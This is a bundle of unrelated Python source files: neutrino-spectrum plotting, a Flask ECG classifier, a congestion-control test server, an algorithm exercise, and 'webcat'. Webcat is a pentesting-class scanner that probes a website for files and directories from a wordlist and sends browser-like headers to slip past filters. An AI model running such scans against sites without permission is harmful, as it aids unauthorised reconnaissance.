        properties['no_backup'] = not self.window.checkBox_keep_backup.isChecked()
        properties['overwrite'] = self.window.checkBox_overwrite.isChecked()
        properties['compression'] = self.window.comboBox_compression.currentText()
        first = self.window.spinBox_first.value()
        last = self.window.spinBox_last.value()
        properties['framerange'] = '{}-{}'.format(first, last)
        # Same input and output means in-place conversion.
        if properties['input'] == properties['output']:
            properties.pop('output')
        self.thread.set_properties(properties)
        self.thread.start()
def main():
    """Create the Qt application and run the Manager-driven main window."""
    import sys
    app = QtWidgets.QApplication(sys.argv)
    # The Manager reference keeps the window alive for the event loop's life.
    test = Manager()
    sys.exit(app.exec_())


if __name__ == '__main__':
    main()
|
<reponame>pershint/reacdb
from __future__ import print_function
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(font_scale=2)
import numpy as np
import scipy as sp
import sys
def dNdEPlot_pts(energies,numSpec,bin_left,bin_right,sst12,m12,PID=None):
    """
    Plot a binned event spectrum as points with bin outlines.

    inputs:
        energies: bin-centre energies (MeV)
        numSpec: event counts per bin
        bin_left, bin_right: left/right bin edges
        sst12, m12: oscillation parameters shown in the annotation
        PID: 'pos' -> label axes in prompt positron energy,
             'nu' -> label axes in antineutrino energy
    """
    num_points = len(energies)
    opacity = 0.9
    fix, ax = plt.subplots()
    plt.plot(energies,numSpec,'ro', alpha=opacity, color='b')
    # Draw each bin's top plus vertical edges down to (effectively) zero.
    plt.hlines(numSpec,bin_left,bin_right, color = 'b')
    plt.vlines(bin_left,numSpec, \
            0.0000000001, color = 'b')
    plt.vlines(bin_right,numSpec, \
            0.0000000001, color = 'b')
    # NOTE(review): annotation position is hard-coded in data coordinates
    # (x~7, y~125) and may fall outside the axes for other spectra.
    ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
            r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,125),
            xytext=(6.5,125))
    plt.ylim(0,np.max(numSpec) + 1)
    plt.ylabel(r'Events/ 200 keV')
    # NOTE(review): two independent ifs with no else — any other PID value
    # yields a plot without x-label or title.
    if PID=='pos':
        plt.xlabel('Prompt Energy (MeV)')
        plt.title(r'Neutrino spectrum at given location in positron energy')
    if PID=='nu':
        plt.xlabel('Antineutrino Energy (MeV)')
        plt.title(r'Neutrino spectrum at given location in antineutrino energy')
    plt.show()
#Takes in a Histogram object as defined in /lib/histogram and plots it
#Takes in a Histogram object as defined in /lib/histogram and plots it
def plot_EventHist(Histogram,sst12,m12):
    """
    Plot a Histogram object (bin_centers/bin_values/bin_lefts/bin_rights)
    as points with bin outlines, annotated with the oscillation parameters.
    """
    num_points = len(Histogram.bin_centers)
    opacity = 0.9
    fix, ax = plt.subplots()
    plt.plot(Histogram.bin_centers,Histogram.bin_values,'ro', \
            alpha=opacity, color='b')
    # Bin tops plus vertical edges down to (effectively) zero.
    plt.hlines(Histogram.bin_values,Histogram.bin_lefts, \
            Histogram.bin_rights, color = 'b')
    plt.vlines(Histogram.bin_lefts,Histogram.bin_values, \
            0.0000000001, color = 'b')
    plt.vlines(Histogram.bin_rights,Histogram.bin_values, \
            0.0000000001, color = 'b')
    # NOTE(review): annotation position hard-coded in data coordinates.
    ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
            r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,200),
            xytext=(6.5,200))
    plt.xlabel('Energy (MeV)')
    plt.ylabel(r'events/$10^{32}proton-years/MeV$')
    plt.title(r'Neutrino spectrum in TNU at input location')
    plt.show()
#Takes in a Histogram object as defined in /lib/histogram and plots it
#Takes in a Histogram object as defined in /lib/histogram and plots it
def plot_TwoEventHist(Hist1,Hist2,sst12,m12):
    """
    Overlay two Histogram objects (Hist1 in red, Hist2 in blue) for visual
    comparison, annotated with the oscillation parameters.
    """
    num_points = len(Hist1.bin_centers)
    opacity = 0.9
    fix, ax = plt.subplots()
    plt.plot(Hist1.bin_centers,Hist1.bin_values,'ro', \
            alpha=opacity, color='r')
    plt.hlines(Hist1.bin_values,Hist1.bin_lefts, \
            Hist1.bin_rights, color = 'r')
    plt.plot(Hist2.bin_centers,Hist2.bin_values,'bo', \
            alpha=opacity, color='b')
    plt.hlines(Hist2.bin_values,Hist2.bin_lefts, \
            Hist2.bin_rights, color = 'b')
    # NOTE(review): annotation position hard-coded in data coordinates.
    ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
            r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,200),
            xytext=(6.5,200))
    plt.xlabel('Energy (MeV)')
    plt.ylabel(r'events/$10^{32}proton-years/MeV$')
    plt.title(r'Comparison of two spectrum histograms')
    plt.show()
def dNdEPlot_line(energies,numSpec,sst12,m12,PID=None):
    """
    Plot dN/dE as a filled line.

    inputs:
        energies: array of energy points (MeV)
        numSpec: spectrum values evaluated at energies
        sst12, m12: oscillation parameters shown in the annotation
        PID: 'pos' for prompt positron energy, 'nu' for antineutrino energy;
             any other value prints a warning and makes no plot
    """
    num_points = len(energies)
    opacity = 0.9
    fig, ax = plt.subplots()
    plt.plot(energies,numSpec, alpha=opacity, color='g')
    plt.fill_between(energies, 1e-10, numSpec, facecolor ='g',alpha = 0.4)
    ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
            r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,35),
            xytext=(6.5,35))
    if PID=='pos':
        plt.xlabel('Prompt Energy (MeV)')
        plt.ylabel(r'$dN/dE_{prompt}$ (MeV)')
        plt.title(r'Event Spectrum as a function of prompt positron energy')
    # BUGFIX: was an independent `if`, so PID='pos' fell into the else below,
    # printed "PID not recognized" and returned without ever calling show().
    elif PID=='nu':
        plt.xlabel('Energy (MeV)')
        plt.ylabel(r'$dN/dE_{\nu}$ (MeV)')
        plt.title(r'Neutrino event spectrum')
    else:
        print("PID not recognized. Not making plot")
        return
    plt.show()
def dNdEPlot_line_TNU(energies,numSpec,sst12,m12,PID=None):
    """Plot a dN/dE event spectrum in TNU units with enlarged tick labels.

    @param energies: energy sample points (MeV)
    @param numSpec: spectrum values (TNU/MeV) evaluated at those energies
    @param sst12: sin^2(theta_12) shown in the annotation
    @param m12: delta m^2_21 shown in the annotation
    @param PID: 'pos' for prompt-positron labels, 'nu' for neutrino labels;
                anything else aborts without plotting
    """
    opacity = 0.9
    # Renamed 'fix' -> 'fig' (typo in the original).
    fig, ax = plt.subplots()
    ax.plot(energies,numSpec, alpha=opacity, color='g')
    ax.fill_between(energies, 1e-10, numSpec, facecolor ='g',alpha = 0.4)
    ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
            r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,50),
            xytext=(6.5,50))
    # NOTE(review): tick.label is deprecated in newer matplotlib (tick.label1)
    # — confirm against the pinned matplotlib version before upgrading.
    for tick in ax.xaxis.get_major_ticks():
        tick.label.set_fontsize(18)
    for tick in ax.yaxis.get_major_ticks():
        tick.label.set_fontsize(18)
    # BUG FIX: same broken if/if/else chain as dNdEPlot_line — PID=='pos'
    # previously fell into the final else and returned before plt.show().
    if PID=='pos':
        plt.xlabel('Prompt Energy (MeV)')
        plt.ylabel(r'$dN/dE_{prompt}$ (TNU/MeV)')
        plt.title(r'Event Spectrum as a function of prompt positron energy')
    elif PID=='nu':
        plt.xlabel('Energy (MeV)')
        plt.ylabel(r'$dN/dE_{\nu}$ (TNU/MeV)')
        plt.title(r'Neutrino event spectrum')
    else:
        print("PID not recognized. Not making plot")
        return
    plt.show()
def CAspectrumPlot(energies,spectrum):
    '''
    Takes an array evaluated at energy points and plots them vs. energy.
    Specific to Canadian spectrum to have labels ready.

    @param energies: energy sample points (MeV)
    @param spectrum: summed oscillated spectrum values at those energies
    '''
    opacity = 0.9
    fig, ax = plt.subplots()
    plt.plot(energies, spectrum, alpha=opacity, color='b')
    plt.xlabel('Energy (MeV)')
    plt.ylabel(r'(Sum of Oscillated Spectra$m^{-2}$)')
    # BUG FIX: the two concatenated literals rendered "...for allCanadian
    # plants" — added the missing space.
    plt.title(r'Plot of oscillated neutrino spectrum at input location for all ' + \
            'Canadian plants')
    plt.show()
def plotSumOscSpectrum(OscSpectra):
    """
    Plots the summed oscillated spectrum (OscSpectra.Summed_Spectra) over the
    energy grid OscSpectra.E_arr using Matplotlib.pyplot.

    (Docstring corrected: the original text described plotting a single
    core's spectrum, but this function plots the sum over all cores.)
    """
    num_points = len(OscSpectra.Summed_Spectra)
    spectrum = OscSpectra.Summed_Spectra
    energies = OscSpectra.E_arr
    opacity = 0.9
    fig, ax = plt.subplots()
    #plt.gcf().subplots_adjust(bottom=0.2)
    plt.plot(energies, spectrum, alpha=opacity, color='g')
    plt.xlabel('Energy (MeV)')
    plt.ylabel(r'(Sum of Oscillated Spectra$m^{-2}$)')
    # Plant identifier comes from the reactor details attached to the spectra.
    plt.title(r'Plot of oscillated Core Spectrums for Plant ' + \
            str(OscSpectra.ReacDetails.index) + ' at input location')
    #plt.xticks(index + bar_width, x, y=0.001)
    #plt.legend()
    #plt.tight_layout() #could use instead of the subplots_adjust line
    plt.show()
def plotCoreOscSpectrum(core_number,OscSpectra):
    """
    Plots the "core_number"s oscillated spectrum in the passed in OscSpectra
    class using Matplotlib.pyplot.

    @param core_number: index of the core within OscSpectra.Osc_Spectra
    @param OscSpectra: object providing Osc_Spectra, E_arr and ReacDetails
    """
    spectrum = OscSpectra.Osc_Spectra[core_number]
    energies = OscSpectra.E_arr
    opacity = 0.9
    fig, ax = plt.subplots()
    plt.plot(energies, spectrum, alpha=opacity, color='g')
    plt.xlabel('Energy (MeV)')
    # BUG FIX: the y-label said 'Unoscillated spectra' (copy-paste from
    # plotCoreUnoscSpectrum) although this function plots Osc_Spectra.
    plt.ylabel(r'Oscillated spectra ($m^{-2}$)')
    plt.title(r'Plot of oscillated Core Spectrum for the ' + str(core_number) + \
        r'th core of Plant ' + str(OscSpectra.ReacDetails.index) + ' at input location')
    plt.show()
def plotCoreUnoscSpectrum(core_number,UnoscSpectra):
    """
    Plot the unoscillated spectrum of core "core_number" from the given
    UnoscSpectra object against its energy grid.

    @param core_number: index of the core within UnoscSpectra.Unosc_Spectra
    @param UnoscSpectra: object providing Unosc_Spectra, E_arr and ReacDetails
    """
    spectrum = UnoscSpectra.Unosc_Spectra[core_number]
    energies = UnoscSpectra.E_arr
    num_points = len(spectrum)
    fig, ax = plt.subplots()
    # Draw directly on the axes object (equivalent to the pyplot state calls).
    ax.plot(energies, spectrum, alpha=0.9, color='g')
    ax.set_xlabel('Energy (MeV)')
    ax.set_ylabel(r'Unoscillated spectra ($m^{-2}$)')
    ax.set_title(r'Plot of Unoscillated Core Spectrum for the ' + str(core_number) + \
        r'th core of Plant ' + str(UnoscSpectra.ReacDetails.index) + ' at input location')
    plt.show()
if __name__ == '__main__':
    # This module is a plotting library; there is nothing to run directly.
    print("No main loop implemented. It's just a library, get real.")
|
<filename>app/app.py
import os
import urllib.request
import pandas as pd
import numpy as np
from flask import Flask, flash, request, redirect, render_template
from werkzeug.utils import secure_filename
import json
import plotly
import plotly.figure_factory as ff
import plotly.offline as py
import plotly.graph_objs as go
import configparser
#import cufflinks as cf
#cf.go_offline()
import keras
from keras.models import load_model
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv1D, MaxPooling1D, GlobalAveragePooling1D
from keras.optimizers import SGD
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
import argparse
from keras import backend as K
#STATIC_DIR = os.path.abspath('../ECG_Analysis/app/static')
# Flask app serving bundled assets from /static. The secret key (used by
# flash()/sessions) is regenerated on every start, so flashed messages do
# not survive a process restart.
app = Flask(__name__,static_url_path='/static')
app.secret_key = os.urandom(24)
# Upload extensions accepted by allowed_file().
ALLOWED_EXTENSIONS = set(['csv', 'xlsx','xls'])
#print(os.getcwd())
def get_default_config():
    """
    Load ../conf/config.ini (relative to the working directory) and return
    its DEFAULT section.
    @return: configparser section with deploy_type/hostname/port settings
    """
    parser = configparser.ConfigParser()
    parser.read('../conf/config.ini')
    return parser['DEFAULT']
# Deployment settings read once at import time; hostname/port are passed to
# the index template and used by app.run() in __main__.
conf = get_default_config()
deploy_type = conf['deploy_type']
print(deploy_type)
hostname = conf['hostname']
port = conf['port']
@app.route('/')
def upload_form():
    """
    Home URL handler: render index.html, passing the configured hostname and
    port so the template can build its form action URLs.
    @return: Rendered html view
    """
    return render_template('index.html',hostname=hostname, port=port)
def allowed_file(filename):
    """
    Check whether the uploaded filename carries an accepted extension.
    @param filename: name of the uploaded file
    @return: True if the extension is in ALLOWED_EXTENSIONS
    """
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
@app.route('/uploader', methods=['GET','POST'])
def uploader():
    """
    Handle an analysis request: either a pasted demo sample (form field
    'samplevalue') or an uploaded csv/xls/xlsx file. Runs the models via
    predictionHandler() and renders the result table plus plot.
    @return: rendered response.html, or a redirect on invalid input
    """
    if request.method == 'POST':
        # Distinguish a real file upload from the demo-text form field.
        test_flag = ''
        if 'file' in request.files:
            test_flag = 'file'
        else:
            test_flag = 'demo'
            demo_data = request.form['samplevalue']
        if test_flag == 'demo' :
            demo_data = demo_data.split(',')
            demo_data = [ float(val) for val in demo_data]
            out_df, graphJSON = predictionHandler(demo_data = demo_data)
            colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
            table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
            pp_table = table.to_html()
            return render_template('response.html', table = pp_table, graphplot = graphJSON)
        else:
            file = request.files['file']
            if file.filename == '':
                flash('No file selected for uploading')
                return redirect(request.url)
            if file and allowed_file(file.filename):
                filename = secure_filename(file.filename)
                file.save(filename)
                flash('File successfully uploaded...call the handler now..')
                # BUG FIX: use rsplit on the *sanitized* name so files with
                # several dots (e.g. "a.b.csv") get the real extension, matching
                # allowed_file(); the original used split('.')[1].
                extension = filename.rsplit('.', 1)[1].lower()
                plot_index = request.form['plot_sample']
                # BUG FIX: read back the sanitized name the file was actually
                # saved under; the original passed file.filename, which breaks
                # whenever secure_filename() rewrites the name.
                out_df, graphJSON = predictionHandler(filename, extension, plot_index= plot_index)
                colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
                table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
                pp_table = table.to_html()
                return render_template('response.html', table = pp_table, graphplot = graphJSON)
            else:
                flash('Allowed file types are csv,xls,xlsx')
                return redirect(request.url)
def predictionHandler(test_file=False,extension='', plot_index=1, demo_data=[]):
    """
    Run the ECG and MI models on the uploaded file or the demo sample and
    build the result table plus the plotly graph payload.
    @param test_file: path of the uploaded analysis file, or False for demo data
    @param extension: file extension ('csv', 'xls' or 'xlsx')
    @param plot_index: 1-based index of the record to plot
    @param demo_data: list of floats when called in demo mode
    @return: (result DataFrame, plotly graph JSON string)
    @raise ValueError: for an unexpected file extension
    """
    plot_index = int(plot_index)
    if test_file:
        if extension == "csv":
            df = pd.read_csv(test_file)
        elif (extension == "xls" or extension == "xlsx"):
            df = pd.read_excel(test_file)
        else:
            raise ValueError('Input file with unexpected extension, please use csv, xlsx,xls files')
        test_rec = df.values
        # Models expect shape (records, samples, 1).
        test_rec = test_rec.reshape(test_rec.shape[0], test_rec.shape[1],1)
    else:
        test_rec = np.array(demo_data)
        test_rec = test_rec.reshape(1, test_rec.shape[0],1)
        df_data = np.array(demo_data)
        df_data = df_data.reshape(1,df_data.shape[0])
        df = pd.DataFrame(data=df_data)
    # NOTE(review): both models are reloaded from disk on every request —
    # consider loading once at module import if request latency matters.
    model_ECG_loaded = load_model('../models/model_ECG_final.h5')
    model_MI_loaded = load_model('../models/model_MI_final.h5')
    print("models loaded...")
    out_classes = model_ECG_loaded.predict(test_rec)
    print("prediction completed..")
    ECG_class = np.argmax(out_classes,axis=1)
    out_classes = model_MI_loaded.predict(test_rec)
    MI_class = np.argmax(out_classes,axis=1)
    out_df = pd.DataFrame(columns =['ECG_Class', 'MI_Class'], data = np.array([ECG_class, MI_class]).transpose())
    out_df['User_id'] = out_df.index+1
    out_df = out_df[['User_id', 'ECG_Class','MI_Class']]
    ecg_clas_mapper = {0:'N', 1:'S', 2:'V', 3:'F',4:'Q'}
    MI_class_mapper = {0:'Normal', 1:'Abnormal'}
    out_df.ECG_Class = out_df.ECG_Class.map(ecg_clas_mapper)
    out_df.MI_Class = out_df.MI_Class.map(MI_class_mapper)
    ecg_class = out_df.iloc[plot_index-1].ECG_Class
    mi_class = out_df.iloc[plot_index-1].MI_Class
    # BUG FIX: MI_Class has already been mapped to 'Normal'/'Abnormal', so the
    # original comparison `mi_class == 0` was always False and every record
    # was labelled 'Abnormality' in the plot title.
    if mi_class == 'Normal':
        mi_class = 'Normal'
    else:
        mi_class = 'Abnormality'
    graphs = createECGGraph(df,plot_index,ecg_class,mi_class)
    graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
    return out_df,graphJSON
def createECGGraph(df, plot_index, ecg_class, mi_class):
    """
    Build the plotly line-plot specification for one ECG record.
    @param df - The intermediate dataframe holding the raw readings
    @param plot_index - 1-based index of the record to plot
    @param ecg_class - The ecg class identified for the plotted record
    @param mi_class - The Myocardial Infarction class for the plotted record
    @return: list with a single plotly graph dict (data + layout)
    """
    row = df.iloc[plot_index - 1]
    # One x position per non-null reading in the selected record.
    xvals = list(range(0, row.count()))
    yvals = list(row.values)
    trace = {
        "x": xvals,
        "y": yvals,
        "type": "scatter"
    }
    layout = {
        'title': f"ECG Readings for the record# {plot_index}, ECG class = {ecg_class} <br> MI tests shows {mi_class}",
        'yaxis': {
            'title': "ECG Readings"
        },
        'xaxis': {
            'title': "Time instance"
        }
    }
    return [{'data': [trace], 'layout': layout}]
if __name__ == "__main__":
app.run(host='0.0.0.0', port=port,threaded=False) |
<reponame>comnetsAD/ALCC
import json
import random
import socket
import subprocess
import sys
import time
import traceback
import analyze_pcap
# Well-known ports: TCP control channel plus the UDP hole-punching port used
# by the copa test.
std_ports = {
    "ctrl": 6000,
    "udp_punch": 6001
}
MAX_CTRL_MSG_SIZE = 1024 * 1024  # upper bound for a single JSON control message
run_time=30        # seconds each congestion-control test runs
res_dir="results"  # directory tcpdump captures are written into
# Advertised to clients in response to the "get_config" request.
server_config = {
    "available_cong_algs": ["copa", "cubic", "bbr"]
}
# Per-algorithm run description sent to the client; copa uses run_time+5 —
# presumably so the remote receiver outlives the local sender (confirm).
cong_algs = {
    "cubic" : {"prog": "iperf3", "port": "5201", "time": str(run_time)},
    "bbr" : {"prog": "iperf3", "port": "5201", "time": str(run_time)},
    "copa" : {"prog": "receiver", "time": str(run_time+5)}
}
# Ctrl socket: listen for client control connections on all interfaces.
ctrl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ctrl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ctrl_sock.bind(("0.0.0.0", std_ports["ctrl"]))
ctrl_sock.listen(10)
# Serve one client at a time: accept a control connection, then process JSON
# requests (get_config / test_cong_alg / close) until the client disconnects.
# NOTE(review): sendall()/sendto() below are given str objects, which only
# works on Python 2; under Python 3 they require bytes — confirm the target
# interpreter before porting.
while True:
    try:
        print("Waiting for connection")
        ctrl_conn, ctrl_client_addr = ctrl_sock.accept()
        # Random id keeps this session's pcap files distinct from other runs.
        conn_id = str(random.randint(0, 1e9))
        print("Connected to client '%s'. Assigned id '%s'" % (str(ctrl_client_addr), conn_id))
        while True:
            request_str = ctrl_conn.recv(MAX_CTRL_MSG_SIZE)
            if len(request_str) == 0: continue
            print("Got", request_str)
            request = json.loads(request_str)
            if request["request"] == "get_config":
                config = server_config
                config["conn_id"] = conn_id
                ctrl_conn.sendall(json.dumps(server_config))
            elif request["request"] == "test_cong_alg":
                if request["cong_alg"] in ["cubic", "bbr"]:
                    # Switch the kernel congestion-control algorithm and the
                    # default qdisc that goes with it.
                    if request["cong_alg"] == "cubic":
                        subprocess.call(["sudo", "sysctl", "-w", "net.ipv4.tcp_congestion_control=cubic"])
                        subprocess.call(["sudo", "sysctl", "-w", "net.core.default_qdisc=pfifo_fast"])
                    elif request["cong_alg"] == "bbr":
                        subprocess.call(["sudo", "sysctl", "-w", "net.ipv4.tcp_congestion_control=bbr"])
                        subprocess.call(["sudo", "sysctl", "-w", "net.core.default_qdisc=fq"])
                    else:
                        assert(False)
                    # Capture the run; pcap named <client-ip>-<session>-<alg>.
                    subprocess.Popen(('sudo tcpdump -i eth0 -w %s/%s-%s-%s' % (res_dir, ctrl_client_addr[0], conn_id, request["cong_alg"])).split(' '))
                    ctrl_conn.sendall(json.dumps(cong_algs[request["cong_alg"]]))
                    # --one-off: the iperf3 server exits after a single test.
                    subprocess.call(["iperf3", "-s", "--one-off"])
                    # NOTE(review): pkill is issued twice in the original —
                    # looks deliberate (belt and braces); confirm.
                    subprocess.call(['sudo', 'pkill', 'tcpdump'])
                    subprocess.call(['sudo', 'pkill', 'tcpdump'])
                elif request["cong_alg"] in ["copa"]:
                    subprocess.call(["sudo", "sysctl", "-w", "net.core.default_qdisc=pfifo_fast"])
                    # UDP hole punch: wait for the client's probe, reply, then
                    # run the copa sender towards the observed address.
                    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    udp_sock.bind(("", std_ports["udp_punch"]))
                    ctrl_conn.sendall(json.dumps(cong_algs[request["cong_alg"]]))
                    _, addr = udp_sock.recvfrom(1024)
                    print("UDP punched %s" % str(addr))
                    udp_sock.sendto("Sesame", addr)
                    udp_sock.close()
                    time.sleep(5) # Give the client time to set things up
                    subprocess.Popen(('sudo tcpdump -i eth0 -w %s/%s-%s-%s' % (res_dir, ctrl_client_addr[0], conn_id, request["cong_alg"])).split(' '))
                    # onduration is in milliseconds.
                    subprocess.call(["./sender",
                        "serverip="+addr[0],
                        "serverport="+str(addr[1]),
                        "sourceport="+str(std_ports["udp_punch"]),
                        "onduration="+str(int(run_time * 1000)),
                        "cctype=markovian",
                        "delta_conf=auto",
                        "offduration=0",
                        "traffic_params=deterministic,num_cycles=1"])
                    print("Copa done")
                    subprocess.call(['sudo', 'pkill', 'tcpdump'])
                    subprocess.call(['sudo', 'pkill', 'tcpdump'])
                else:
                    print("Request for unrecognized algorithm '%s'" % request["cong_alg"])
            elif request["request"] == "close":
                print("Closing connection with client '%s'" % str(ctrl_client_addr))
                ctrl_conn.close()
                break
            # Summarise the capture for whatever request was just served.
            results = analyze_pcap.parse_file('%s/%s-%s-%s' % (res_dir, ctrl_client_addr[0], conn_id, request["cong_alg"]))
            print(ctrl_client_addr[0], conn_id, request["cong_alg"], results)
    except Exception:
        # Keep serving other clients even if one session blows up.
        print("Error while communicating with client.")
        print(traceback.format_exc())
|
<reponame>livlikwav/Algorithms
'''
7 7
2 0 0 0 1 1 0
0 0 1 0 1 2 0
0 1 1 0 1 0 0
0 1 0 0 0 0 0
0 0 0 0 0 1 1
0 1 0 0 0 0 0
0 1 0 0 0 0 0
'''
import copy
# Grid size: N rows, M columns (read from stdin).
N, M = map(int, input().split())
# Board values: 0 = empty, 1 = wall, 2 = virus.
data = [list(map(int, input().split())) for _ in range(N)]
# Shared scratch board, re-copied and mutated by set_walls()/spread_virus().
temp = [[0] * M for _ in range(N)]
result = 0
# Neighbour offsets: (0,-1) left, (0,+1) right, (-1,0) up, (+1,0) down.
dx = [0, 0, -1, +1]
dy = [-1, +1, 0, 0]
# debug
# print(N, M)
# print(data)
# print(temp)
# print(result)
def set_walls(map:list, pos:tuple, count:int) -> None:
    """Recursively try every placement of 3 extra walls, updating the global
    `result` with the best safe-area count found.

    Scans cells left-to-right, top-to-bottom from `pos`; at each cell it
    branches into "leave empty" and "place wall" (count + 1).

    NOTE(review): the parameter name shadows the builtin `map`, and the
    module-global `temp` board is shared across all recursion levels — each
    call re-copies `map` into `temp` before branching, which the
    backtracking's correctness depends on. Confirm before refactoring.
    """
    global result
    x, y = pos
    # Snapshot the caller's board into the shared scratch grid.
    for i in range(len(map)):
        temp[i] = copy.deepcopy(map[i])
    if count == 3:
        # All three walls placed: evaluate this configuration.
        result = max(result, spread_virus(temp))
        return
    if y + 1 < M: # go right
        set_walls(temp, (x, y+1), count)
        temp[x][y+1] = 1
        set_walls(temp, (x, y+1), count + 1)
    elif x + 1 < N: # new line
        set_walls(temp, (x+1, 0), count)
        temp[x+1][0] = 1
        set_walls(temp, (x+1, 0), count + 1)
    else: # (N-1, M-1)
        return
def spread_virus(map: list) -> int:
    """Copy `map` into the global scratch board, spread every virus (value 2)
    via dfs(), and return the number of cells that stay safe (value 0).

    (Annotation corrected: the parameter is a 2-D list, not an int.)
    """
    for i in range(len(map)):
        temp[i] = copy.deepcopy(map[i])
    visited = [[False] * M for _ in range(N)]
    # Flood-fill from every virus cell.
    for i in range(N):
        for j in range(M):
            if not visited[i][j]:
                if temp[i][j] == 2:
                    visited[i][j] = True
                    dfs(temp, visited, (i, j))
    # count safe area
    count = 0
    for i in range(N):
        for j in range(M):
            if temp[i][j] == 0:
                count += 1
    return count
def dfs(temp: list, visited: list, pos: tuple) -> None:
    """Spread the virus from `pos` into all reachable empty cells.

    Marks each newly infected cell (sets value 2 and visited=True) and
    recurses; relies on the module globals dx/dy/N/M for neighbours and
    bounds.
    """
    x, y = pos
    for i in range(4):
        nx = x + dx[i]
        ny = y + dy[i]
        if 0 <= nx < N and 0 <= ny < M:
            if not visited[nx][ny]:
                if temp[nx][ny] == 0:
                    visited[nx][ny] = True
                    temp[nx][ny] = 2
                    dfs(temp, visited, (nx, ny))
# Enumerate all 3-wall placements starting at the top-left corner and print
# the maximum achievable safe area.
set_walls(data, (0,0), 0)
print(result)
'''
<Answer>
n, m = map(int, input().split())
data = [] # 초기 맵 리스트
temp = [[0] * m for _ in range(n)] # 벽을 설치한 뒤의 맵 리스트
for _ in range(n):
data.append(list(map(int, input().split())))
# 4가지 이동방향에 대한 리스트
dx = [-1, 0, 1, 0]
dy = [0, 1, 0, -1]
result = 0
# DFS를 통해 각 바이러스가 사방으로 퍼지도록 하기
def virus(x, y):
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
# 상 하 좌 우 중에서 바이러스가 퍼질 수 있는 경우
if nx >= 0 and nx < n and ny >= 0 and ny < m:
if temp[nx][ny] == 0:
# 해당 위치에 바이러스 배치하고, 다시 재귀적으로 수행
temp[nx][ny] = 2
virus(nx, ny)
# 현재 맵에서 안전 영역의 크기 계산하는 메서드
def get_score():
score = 0
for i in range(n):
for j in range(m):
if temp[i][j] == 0:
score += 1
return score
# DFS를 이용해 울타리를 설치하면서, 매번 안전 영역의 크기 계산
def dfs(count):
global result
# 울타리가 3개 설치된 경우
if count == 3:
for i in range(n):
for j in range(m):
temp[i][j] = data[i][j]
# 각 바이러스의 위치에서 전파 진행
for i in range(n):
for j in range(m):
if temp[i][j] == 2:
virus(i, j)
# 안전 영역의 최댓값 계산
result = max(result, get_score())
return
# 빈 공간에 울타리 설치
for i in range(n):
for j in range(m):
if data[i][j] == 0:
data[i][j] = 1
count += 1
dfs(count)
data[i][j] = 0
count -= 1
dfs(0)
print(result)
''' |
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
=^.^= WEBCAT =^.^=
webcat is a simple website scanner for interesting
files / directories. webcat was written while attending
a pentesting class, therefore it's really quite simple.
Version: 0.3
+ added status filter
+ header changed for avoiding filters
Version: 0.2
+ cleanup
Version: 0.1
+ initial version
Written by <NAME>
https://www.kangafoo.de
"""
import sys
import argparse
import os
import requests
def clear():
    """
    clear() -> no return
    Clear the terminal, using 'cls' on Windows and 'clear' elsewhere.
    """
    command = "cls" if os.name == "nt" else "clear"
    os.system(command)
def infoheader():
    """
    infoheader() -> no return
    Clear the screen, print the banner and the current scan target (read
    from the module-global `options` parsed in __main__).
    """
    clear()
    print("=^.^= WEBCAT =^.^=")
    print("-"*50)
    print("->> Target: %s" %(options.target))
    print("-"*50)
def printhelp():
    """
    printhelp() -> no return
    Clear the screen, print the banner, and display the argparse help text
    (uses the module-global `parser` built in __main__).
    """
    clear();
    print("=^.^= WEBCAT =^.^=")
    parser.print_help()
def createlist(myfile,mytarget):
    """
    createlist(string) -> list
    Read a wordlist of files / directories and join each entry onto the
    target URL for scanning.
    @param myfile: path of the wordlist (one entry per line)
    @param mytarget: base URL, e.g. http://example.com
    @return: list of full URLs to probe
    """
    newlist = []
    # BUG FIX: the original left the file handle open; 'with' guarantees it
    # is closed even if reading fails.
    with open(myfile, "r") as handle:
        for line in handle:
            line = line.replace("\n", "") #rem break
            line = line.replace("\r", "") #rem return
            newlist.append(mytarget + "/" + line)
    return newlist
def scantarget(host,status_filter):
    """
    scantarget(string) -> no return
    Request the given URL with a browser-like header set and print the
    status line. With the global verbose flag (`verb`) set, every result is
    printed; otherwise only status codes in `status_filter`.
    @param host: full URL to probe
    @param status_filter: list of HTTP status codes to display
    """
    user_agent = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.8',
        'Accept-Encoding': 'gzip'
    }
    # BUG FIX: without a timeout a single unresponsive host hangs the whole
    # scan indefinitely; 10s bounds each request.
    scan = requests.get(host, headers=user_agent, timeout=10)
    if verb:
        print("["+str(scan.status_code)+"] "+host)
    elif scan.status_code in status_filter:
        print("["+str(scan.status_code)+"] "+host)
